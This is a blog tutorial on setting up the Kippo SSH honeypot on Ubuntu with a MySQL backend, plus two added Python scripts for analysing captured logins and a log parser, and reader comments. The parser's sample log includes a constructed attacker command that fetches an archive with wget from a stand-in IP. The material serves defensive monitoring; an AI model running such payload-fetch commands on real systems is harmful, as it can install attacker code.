kippo | medium interaction honeypot | ubuntu

11 Jan

Kippo is a medium interaction SSH honeypot written in Python, designed to log brute force attacks and the shell session that follows a successful login. If you check https://zabomber.dyndns.org/kippo_rpts/graphs/index.php you will see my current honeypot (Jack), which has gathered some really interesting attacks over the past couple of months.

In this brief write-up I will show my experience installing Kippo on an Ubuntu system.

First, install the dependencies. I highly recommend MySQL for the Kippo backend: you can then take advantage of the reporting I have configured, and if you later set up a few Kippo honeypots (a honeynet) they can all log to one centralised database instance. Lastly, I recommend the svn version rather than a tarball fetched with wget, as upgrades are a lot simpler to manage with svn.

$ sudo mkdir /opt/kippo 
$ sudo apt-get install subversion 
$ sudo apt-get install mysql-server 
$ sudo apt-get install python-dev openssl python-openssl python-pyasn1 python-twisted python-mysqldb

Next, we check out Kippo:

$ cd /opt/kippo/ 
$ sudo svn checkout http://kippo.googlecode.com/svn/trunk/ .

Next, we set up a non-root system user that the Kippo instance will run as. Its shell is /bin/false because nobody should ever log in as this user (the MySQL user is created in the next step):

$ sudo useradd -s /bin/false -d /home/kippo -m kippo

Next, we create the kippo database and a MySQL user for it; the same credentials go into kippo.cfg later. Change secret to whatever password you wish, and use that value in every step below:

$ mysql -u root -p
Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.1.41-3ubuntu12.10 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> CREATE DATABASE kippo;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL ON kippo.* TO 'kippo'@'localhost' IDENTIFIED BY 'secret';
mysql> exit

We then import the Kippo table structure into the database. Leave the value off -p so that mysql prompts for the password instead of it landing in your shell history:

$ cd /opt/kippo/doc/sql/
$ mysql -u kippo -p kippo < mysql.sql

Now edit the config file kippo.cfg. There are a number of options you can change as you like, such as the fake hostname and the password that the honeypot accepts. Near the end of the file, uncomment the [database_mysql] section and fill in the database details created above:

[database_mysql] 
host = localhost 
database = kippo 
username = kippo 
password = secret

We also want Kippo listening on port 22. That is the default SSH port and where almost all brute force attacks land; a honeypot on a non-standard port sees far less traffic. Kippo binds port 2222 by default (set in kippo.cfg) because it runs as an unprivileged user, so there are two ways to get it onto port 22. Whichever you pick, if the machine's own sshd still listens on 22, move it to another port first or the bind will fail.

One option is to leave Kippo on 2222 and redirect inbound port 22 to 2222 on your firewall (a NAT PREROUTING redirect rule).

Or, like me, you want Kippo itself bound to port 22, which requires authbind so the kippo user may bind a privileged port:

$ sudo apt-get install authbind

Next, as root, create the authbind permission file for port 22. authbind checks that the invoking user may execute the file, so it only needs to be owned by kippo and executable by kippo; making it world-writable (chmod 777) is unnecessary:

$ sudo touch /etc/authbind/byport/22
$ sudo chown kippo:kippo /etc/authbind/byport/22
$ sudo chmod 500 /etc/authbind/byport/22

Now change the twistd line in /opt/kippo/start.sh from:

twistd -y kippo.tac -l log/kippo.log --pidfile kippo.pid

to:

authbind --deep twistd -y kippo.tac -l log/kippo.log --pidfile kippo.pid

That is all that is needed for Kippo to bind port 22 when it starts.

One last touch: hand the whole installation to the kippo user, otherwise twistd will fail with a permission error on kippo.tac when it runs as kippo:

$ sudo chown -R kippo:kippo /opt/kippo/

Now we can start the honeypot. Very important: do not run it as root. Because the kippo user was created with /bin/false as its shell, a plain su kippo will not give you a shell; pass one explicitly:

$ sudo su -s /bin/bash kippo
kippo@localhost:~$ cd /opt/kippo
kippo@localhost:/opt/kippo$ ./start.sh
Starting kippo in background...Loading dblog engine: mysql

We check that the SSH honeypot is running, in my case on port 22:

$ sudo netstat -atnp | grep ':22 '
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 3104/python

From another computer we launch an nmap version scan against port 22 (use 2222 if you kept the default port):

$ nmap -Pn -sV -p 22 192.168.1.1

Great, we have our fake SSH server:

Nmap scan report for 192.168.1.1
Host is up (0.00046s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 5 (protocol 2.0)
Service Info: OS: Linux

The advertised version is Kippo's default banner string, also set in kippo.cfg. It is widely known, so if you care about attackers fingerprinting the honeypot, change it to something that matches the system you are imitating.

Now we try to connect with the password that the honeypot accepts (123456 by default, changeable in kippo.cfg); after entering it we land in the fake shell:

$ ssh -l root -p 22 192.168.1.1
Password:
sales#

OK, now on the honeypot machine we check the database for all the SSH login attempts:

$ mysql -u kippo -p
> use kippo;
> select * from auth;

+----+----------------------------------+---------+----------+----------+---------------------+
| id | session                          | success | username | password | timestamp           |
+----+----------------------------------+---------+----------+----------+---------------------+
|  1 | 6eb05042605211e0b00c000c29fc1cf3 |       0 | root     | sdfasdf  | 2011-04-06 13:33:19 |
|  2 | 6eb05042605211e0b00c000c29fc1cf3 |       0 | root     | quit     | 2011-04-06 13:34:42 |
|  3 | cfbead06605d11e09cf5000c29fc1cf3 |       0 | root     | sdfasdfa | 2011-04-06 14:55:21 |
|  4 | cfbead06605d11e09cf5000c29fc1cf3 |       1 | root     | 123456   | 2011-04-06 14:56:46 |
+----+----------------------------------+---------+----------+----------+---------------------+

You can see all the attempts, failed and successful. The other tables hold more interesting data: sessions records the attacker's IP and start/end time of each connection, input the commands typed into the fake shell, and ttylog the raw terminal recording:

> show tables;

+-----------------+
| Tables_in_kippo |
+-----------------+
| auth            |
| clients         |
| input           |
| sensors         |
| sessions        |
| ttylog          |
+-----------------+
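A plain select on auth is fine for a glance, but the questions I actually ask of a honeypot are which credentials get tried most, which source addresses are hammering it, and which sessions got through. The script below is an added example of mine, not part of Kippo and not something from the original write-up: it builds the auth and sessions tables in an in-memory SQLite database with the column layout of Kippo's doc/sql/mysql.sql so that it runs offline, loads the four auth rows from the table above plus two constructed sessions rows (the IPs are invented), and runs the three queries. Against the real honeypot you would hand the same SQL to MySQLdb, using %s placeholders instead of ?.

```python
import sqlite3

# Column layout of Kippo's auth and sessions tables (doc/sql/mysql.sql),
# re-created in SQLite so the queries below run without a MySQL server.
SCHEMA = """
CREATE TABLE sessions (
    id        CHAR(32) PRIMARY KEY,
    starttime DATETIME NOT NULL,
    endtime   DATETIME,
    sensor    INTEGER NOT NULL,
    ip        VARCHAR(15) NOT NULL DEFAULT '',
    termsize  VARCHAR(7),
    client    INTEGER
);
CREATE TABLE auth (
    id        INTEGER PRIMARY KEY,
    session   CHAR(32) NOT NULL,
    success   TINYINT NOT NULL,
    username  VARCHAR(100) NOT NULL,
    password  VARCHAR(100) NOT NULL,
    timestamp DATETIME NOT NULL
);
"""

# Constructed sample data: the auth rows are the four from the article,
# the sessions rows (and their source IPs) are invented for the join.
SESSIONS = [
    ("6eb05042605211e0b00c000c29fc1cf3", "2011-04-06 13:33:10", "2011-04-06 13:34:50", 1, "192.168.1.5", "80x24", 1),
    ("cfbead06605d11e09cf5000c29fc1cf3", "2011-04-06 14:55:15", "2011-04-06 14:58:00", 1, "10.0.0.9", "80x24", 1),
]
AUTH = [
    (1, "6eb05042605211e0b00c000c29fc1cf3", 0, "root", "sdfasdf", "2011-04-06 13:33:19"),
    (2, "6eb05042605211e0b00c000c29fc1cf3", 0, "root", "quit", "2011-04-06 13:34:42"),
    (3, "cfbead06605d11e09cf5000c29fc1cf3", 0, "root", "sdfasdfa", "2011-04-06 14:55:21"),
    (4, "cfbead06605d11e09cf5000c29fc1cf3", 1, "root", "123456", "2011-04-06 14:56:46"),
]


def load_sample_db():
    """Build the in-memory stand-in for the kippo database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO sessions VALUES (?,?,?,?,?,?,?)", SESSIONS)
    conn.executemany("INSERT INTO auth VALUES (?,?,?,?,?,?)", AUTH)
    conn.commit()
    return conn


def top_credentials(conn, limit=10):
    """Most-tried username/password pairs, whether or not they worked."""
    return conn.execute(
        "SELECT username, password, COUNT(*) AS tries "
        "FROM auth GROUP BY username, password "
        "ORDER BY tries DESC, username, password LIMIT ?", (limit,)).fetchall()


def attempts_by_ip(conn):
    """Attempts and successes per source IP. auth only stores the session
    id, so the attacker address has to come from the sessions table."""
    return conn.execute(
        "SELECT s.ip, COUNT(*) AS attempts, SUM(a.success) AS successes "
        "FROM auth a JOIN sessions s ON a.session = s.id "
        "GROUP BY s.ip ORDER BY attempts DESC, s.ip").fetchall()


def successful_logins(conn):
    """Sessions where the attacker reached the fake shell; these are the
    ones whose tty recording is worth replaying with utils/playlog.py."""
    return conn.execute(
        "SELECT a.session, s.ip, a.username, a.password, a.timestamp "
        "FROM auth a JOIN sessions s ON a.session = s.id "
        "WHERE a.success = 1 ORDER BY a.timestamp").fetchall()


if __name__ == "__main__":
    db = load_sample_db()
    print("top credentials:", top_credentials(db))
    print("per source IP:  ", attempts_by_ip(db))
    print("got in:         ", successful_logins(db))
```

The join in attempts_by_ip is the one to remember: everything about who the attacker is lives in sessions, keyed by the 32-character session id that auth, input and ttylog all carry.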
Other interesting files in the Kippo installation:

dl/ – files downloaded with wget are stored here
log/kippo.log – log/debug output
log/tty/ – session logs
utils/playlog.py – utility to replay session logs
utils/createfs.py – used to create fs.pickle
fs.pickle – fake filesystem
honeyfs/ – file contents for the fake filesystem – feel free to copy a real system here
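The database is the convenient path, but log/kippo.log records the same login attempts plus every command typed in the fake shell, and it is all you have if the MySQL backend is not configured. The parser below is an added example of mine (not Kippo's code and not from the original write-up): it pulls the login attempts and CMD lines out of the log, tallies failures and successes per source IP, and extracts the URLs an attacker tried to fetch, which is a quick cross-check of what should have appeared in dl/. The sample lines are constructed in the layout I assume Kippo's twistd log uses; the bracketed prefix may differ between versions, so adjust the two regexes if your log looks different.

```python
import re
from collections import defaultdict

# Constructed sample log lines in the shape Kippo's twistd log is assumed
# to use for this example (the bracketed prefix varies between versions).
SAMPLE_LOG = """\
2011-04-06 13:33:10+0200 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 192.168.1.5:51022 (192.168.1.1:22) [session: 6eb05042605211e0b00c000c29fc1cf3]
2011-04-06 13:33:19+0200 [SSHService ssh-userauth on HoneyPotTransport,1,192.168.1.5] login attempt [root/sdfasdf] failed
2011-04-06 13:34:42+0200 [SSHService ssh-userauth on HoneyPotTransport,1,192.168.1.5] login attempt [root/quit] failed
2011-04-06 14:55:21+0200 [SSHService ssh-userauth on HoneyPotTransport,2,10.0.0.9] login attempt [root/sdfasdfa] failed
2011-04-06 14:56:46+0200 [SSHService ssh-userauth on HoneyPotTransport,2,10.0.0.9] login attempt [root/123456] succeeded
2011-04-06 14:57:03+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,10.0.0.9] CMD: uname -a
2011-04-06 14:57:20+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,10.0.0.9] CMD: wget http://198.51.100.7/x.tgz
"""

# The source IP is the last comma-separated field inside the first [...]
# prefix. [^\]]* keeps the match inside that prefix so a ']' further along
# the line (e.g. inside a typed command) cannot confuse it.
PREFIX = r"^(?P<ts>\S+ \S+) \[[^\]]*,(?P<ip>[\d.]+)\] "
LOGIN_RE = re.compile(PREFIX + r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)$")
CMD_RE = re.compile(PREFIX + r"CMD: (?P<cmd>.*)$")
URL_RE = re.compile(r"https?://\S+")


def parse_kippo_log(text):
    """Split a kippo.log into login attempts and shell commands.
    Lines that match neither pattern (connection setup, debug) are skipped."""
    attempts, commands = [], []
    for line in text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            attempts.append({"ts": m.group("ts"), "ip": m.group("ip"),
                             "user": m.group("user"), "pw": m.group("pw"),
                             "success": m.group("result") == "succeeded"})
            continue
        m = CMD_RE.match(line)
        if m:
            commands.append({"ts": m.group("ts"), "ip": m.group("ip"),
                             "cmd": m.group("cmd")})
    return attempts, commands


def attempts_per_ip(attempts):
    """Failed/succeeded counts per attacker address."""
    counts = defaultdict(lambda: {"failed": 0, "succeeded": 0})
    for a in attempts:
        counts[a["ip"]]["succeeded" if a["success"] else "failed"] += 1
    return dict(counts)


def fetched_urls(commands):
    """URLs found in typed commands; compare against the contents of dl/."""
    urls = []
    for c in commands:
        urls.extend(URL_RE.findall(c["cmd"]))
    return urls


if __name__ == "__main__":
    attempts, commands = parse_kippo_log(SAMPLE_LOG)
    print(attempts_per_ip(attempts))
    for c in commands:
        print(c["ts"], c["ip"], c["cmd"])
    print("fetched:", fetched_urls(commands))
```

Run it over the real file with parse_kippo_log(open("/opt/kippo/log/kippo.log").read()); a session that logged in and then ran wget is the one to replay with utils/playlog.py.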

Lastly, there are some really cool third-party tools which I use to monitor the stats, display the sessions, etc. Check them out here:

Graphs : http://bruteforce.gr/kippo-graph
Ajaxterm : http://www.daveeddy.com/tutorials-scripts/ubuntu/ajaxterm-for-kippo-logs/

That’s it. You now have a medium interaction honeypot to capture attacks on your network.


7 Responses to “kippo | medium interaction honeypot | ubuntu”

  1. Ion January 12, 2012 at 12:06 am #

    Hello Darryn. This is Ion from BruteForce.gr. Just to inform you that Kippo-Graph has reached version 0.6.2 (and 0.6.3 will be uploaded soon). You might want to link at http://bruteforce.gr/kippo-graph to always be up to date ;) Thanks for the mention, and I enjoyed your article!

  2. darrynvantonder January 12, 2012 at 11:02 am #

    Hi Ion

    Thanks for the feedback. I have updated my article with the correct link. Awesome work on the graphs!!

    Cheers

  3. Elizabeth June 19, 2012 at 2:50 am #

    thanks for this how-to, it has been very helpful!
    one question though: why did you want the shell of kippo to be bin/bash?

  4. Elizabeth June 19, 2012 at 2:50 am #

    ah! sorry, I mean bin/false! (instead of bin/bash)

  5. darrynvt June 21, 2012 at 6:55 pm #

    Elizabeth: thanks for the response. To answer your question, I haven’t had the time to dig up the script i used to auto start kippo as the ‘kippo’ user, so I used /bin/bash to allow me login as kippo and start it up. I know there is a better way of doing it.

    Care to assist ;)?

  6. things just got real March 18, 2013 at 2:52 pm #

    sudo -u kippo /opt/kippo/start.sh
    Starting kippo in background...Unhandled Error
    Traceback (most recent call last):
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 652, in run
        runApp(config)
      File "/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py", line 23, in runApp
        _SomeApplicationRunner(config).run()
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 386, in run
        self.application = self.createOrGetApplication()
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 451, in createOrGetApplication
        application = getApplication(self.config, passphrase)
    --- ---
      File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in getApplication
        application = service.loadApplication(filename, style, passphrase)
      File "/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in loadApplication
        application = sob.loadValueFromFile(filename, 'application', passphrase)
      File "/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 203, in loadValueFromFile
        fileObj = open(filename, mode)
    exceptions.IOError: [Errno 13] Permission denied: 'kippo.tac'

    Any ideas why this error pop-ups, followed all steps from the tutorial.

    • darrynvt April 9, 2013 at 10:00 am #

      What user are you running this as? Kippo? Who owns the file it's giving permission errors for?
